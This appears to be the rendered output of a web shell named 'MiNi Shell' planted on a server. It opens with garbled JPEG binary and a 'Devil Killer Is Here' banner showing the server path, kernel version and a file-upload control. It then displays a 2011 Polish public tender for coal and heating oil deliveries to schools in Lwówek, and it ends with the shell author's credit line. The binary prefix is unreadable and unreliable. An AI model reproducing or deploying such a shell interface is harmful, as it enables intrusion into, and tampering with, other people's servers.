JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/271043-N-2011.html

<p class="kh_header"><b>Lwówek: Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r</b><br>
<b>Numer ogłoszenia: 271043 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.                                                                                                                         Zakup i dostawa środków opałowych w asortymencie wyszczególnionym poniżej, w szacunkowo wyliczonych ilościach na okres grzewczy 2011/2012r. Wielkość dostaw jest uzależniona od warunków atmosferycznych i trwania okresu grzewczego.                                                                                              2. Przedmiot zamówienia obejmuje także załadunek opału, transport od Dostawcy na miejsce przeznaczenia wskazane w lokalizacji dostaw, oraz rozładunek opału na miejscu dostaw  - placówki oświatowe z terenu miasta i gminy Lwówek.                                                                                    Jednokrotna minimalna dostawa środków opałowych - stałych typu:  węgiel, koks i miał w ilości trzech (3)  ton w jedno miejsce,  jednokrotna dostawa płynnych środków opałowych typu: lekki olej opałowy  - 5000 lit w jedno miejsce.                                                                                                                                3. Wszystkie elementy stanowiące przedmiot zamówienia - środki opałowe zsumowano na podstawie wyliczeń szacunkowych z poprzednich okresów opałowych - zapotrzebowań placówek oświatowych.   Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych panujących w okresie grzewczym, a w tym zwiększenia bądź zmniejszenia zużycia, także z przyczyn technicznych. 
4. Zamawiający dopuszcza możliwość złożenia ofert częściowych dla przedstawionych w siwz poszczególnych asortymentów zamawianego opału opału (Wykonawca ma prawo wyboru asortymentu opału, na który zamierza złożyć ofertę).                                                                                    5. Zestawienie ilościowe przedmiotu zamówienia wraz z wyszczególnieniem minimalnych parametrów energetycznych i  wartości opałowej poszczególnych części zamówienia dla opału stałego:                 wartość opalowa -  MJ/kg / zawartość popiołu %  /  zawartość siarki % (MJ/kg / % / %), oraz dla opału płynnego (lekki olej opałowy) o parametrach jakościowych zgodnych z normą PN-C-96024:L1 Parametry przedmiotu zamówienia określone w siwz należy traktować jako minimalne (nie gorsze jak wyszczególnione w zestawieniu poniżej).                                                                                                      6. Kody Wspólnego Słownika Zamówień, kod CPV:                                                                                       - 09 11 10 00 - 0  węgiel i paliwa na bazie węgla,                                                                                                      - 09 13 51 00 - 5  olej opałowy                                                                                                                            7. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.                                                             8. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.                                                                     9. Zamawiający nie dopuszcza możliwość udzielenia zamówień uzupełniających.                                                                                                                                                                                                                                                         10. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:                                                                                                                       Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Wykonawca przedstawi Zamawiającemu w formie oświadczenia przewidywane zatrudnienie podwykonawców, z wyszczególnieniem  ich danych adresowych.                                                                                                                                                         11. Wymagania stawiane Wykonawcy:                                                                                                                               1) Zamawiający wymaga gwarancji jakości dostarczanego opału w okresie obowiązywania umowy.                                                  2) Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego, wielkość każdej dostawy zależeć będzie od jednostronnych dyspozycji Zamawiającego (poszczególnych placówek oświatowych), terminy i ilości dostaw opału - poszczególne placówki oświatowe będą określały same na bieżąco, zawiadamiając wybranego Wykonawcę telefonicznie, najpóźniej na 2 dni przed każdą dostawą określając konkretnie ilość i miejsce dostawy.                                                            3) Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.                                                                                                                                                                   4) Za termin dokonania dostawy uważany będzie dzień dostarczenia przedmiotu zamówienia do miejsca wskazanego przez pracownika zamawiającego w zgłoszeniu  i jego przyjęcie przez upoważnionego pracownika odpowiedniej jednostki oświatowej.                                                                       5) Odbioru dostawy opału dokona upoważniony pracownik danej jednostki oświatowej do której dostawa była przeznaczona, odbiór musi być potwierdzony pisemnie.                                                                6) Termin płatności - 21 dni od dnia dostarczenia faktury VAT zamawiającemu.                                                                                                                                                               12. Zamawiający nie udziela zaliczek na poczet wykonania przedmiotu zamówienia.         
Zestawienie ilościowe przedmiotu zamówienia.                                                                                                                   
                              Wyszczególnione                części zamówienia	                                                           Asortyment z przedmiotu zamówienia	Wartość energetyczna (minimalne parametry przedmiotu zamówienia)                     (MJ/kg / % / %)	                                           szacunkowa ilość zamówienia
			
A	koks 	27 / 6 / 0,8	15 ton
B	węgiel gruby	30 / 7 / 0,6	70 ton
C	orzech średni	27 / 7 / 0,7	29 ton
D	groszek	24 / 8 / 0,8	13 ton
E	miał  wysokokaloryczny	23 / 18 / 0,8	151 ton
			
F	lekki olej opałowy 	PN-C-96024:L1	25.000 litrów
Lokalizacja dostaw - placówki oświatowe na terenie gminy Lwówek wg poniższego zestawienia.
Lp.	Lokalizacja dostawy	Asortyment	Wielkość zamówienia 
1	Przedszkole Lwówek ul. Sczanieckiej 56  	koks                         	15ton
2	Oddział Przedszkola Lwówek w Koninie   	węgiel gruby	23 ton
3	Oddział Przedszkola Lwówek w Zgierzynce	groszek	8 ton
4	Szkoła Podstawowa Grońsko 25	orzech średni	15 ton
5	Szkoła Podstawowa Lwówek                    ul. Szkolna 4	miał wysokokaloryczny groszek	90ton                                       5ton
6	Zespół Szkoły i Przedszkola              Brody Poznańskie nr 1	węgiel gruby                          miał wysokokaloryczny              	25ton                                    10ton
7	Zespół Szkoły Podstawowej i Przedszkola Chmielinko 55                          - szkoła                                                             - przedszkole                      	węgiel gruby                        orzech średni                            miał wysokokaloryczny	22 tony                                         14 ton                                              6 ton
8	Zespół Szkoły Podstawowej i Przedszkola Pakosław 152                             - szkoła                                                              - przedszkole                      	miał wysokokaloryczny      	45ton
9	Zespół Szkoły i Przedszkola Zębowo, ul. Długa 1, Zębowo	lekki olej opałowy 	25000litrów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0, 09.13.51.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy w tym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, za spełnienie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, za spełnienie warunku posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności, za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, za spełnienie warunku posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności,  za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp.  
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, za spełnienie warunku posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności,  za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp.                                                                                                                                           
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, za spełnienie warunku posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności Zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp.                                                               
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawarto we wzorze (projekcie) umowy, który stanowi zał. nr 4 i 4/1 do siwz.                 Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: tak
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku:                                                                      1. Zmiana wynagrodzenia brutto w przypadku urzędowej zmiany stawki podatku VAT.                                    2. Zmiany związane z zaistnieniem siły wyższej, klęski żywiołowej i innych przyczyn niezależnych od stron umowy, powodujące konieczność zmiany ceny, terminu realizacji umowy, dostaw, miejsc dostaw.                                                                                                                                                              3. Zmiany wyszczególnione we wzorze umowy § 8, ust. 3 wzoru umowy - zał. nr 4 i §1 ust. 4 - zał. nr 4/1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bezpłatnie w Urzędzie Miasta i Gminy w Lwówku ul. Ratuszowa 2, 64-310 Lwówek, pokój nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 5 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r. 
Asortyment - koks.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wartość energetyczna (minimalne parametry przedmiotu zamówienia)                     (MJ/kg / % / %) - 27 / 6 / 0,8; szacunkowa ilość zamówienia - 15 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r. 
asortyment - B - węgiel gruby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment z przedmiotu zamówienia węgiel gruby, wartość energetyczna (minimalne parametry przedmiotu zamówienia) (MJ/kg / % / %) - 30 / 7 / 0,6; szacunkowa ilość zamówienia 70 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r.  
asortyment C - orzech średni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment z przedmiotu zamówienia orzech średni. Wartość energetyczna (minimalne parametry przedmiotu zamówienia)                     (MJ/kg / % / %) 27 / 7 / 0,7;  szacunkowa ilość zamówienia 29 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r.  w asortymencie D - groszek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment z przedmiotu zamówienia D - groszek, wartość energetyczna (minimalne parametry przedmiotu zamówienia)                     (MJ/kg / % / %) 24 / 8 / 0,8; szacunkowa ilość zamówienia 13 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r. w asortymencie E - miał wysokokaloryczny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment z przedmiotu zamówienia miał  wysokokaloryczny, Wartość energetyczna (minimalne parametry przedmiotu zamówienia)                     (MJ/kg / % / %) 23 / 18 / 0,8; szacunkowa ilość zamówienia - 151 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa środków opałowych do szkół i placówek oświatowych z terenu miasta i gminy Lwówek na okres grzewczy od października 2011r. do czerwca 2012r. w asortymencie F - lekki olej opałowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment z przedmiotu zamówienia F - lekki olej opałowy, wartość energetyczna minimalne parametry przedmiotu zamówienia) określa PN-C-96024:L1 ; szacunkowa ilość zamówienia - 25.000 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com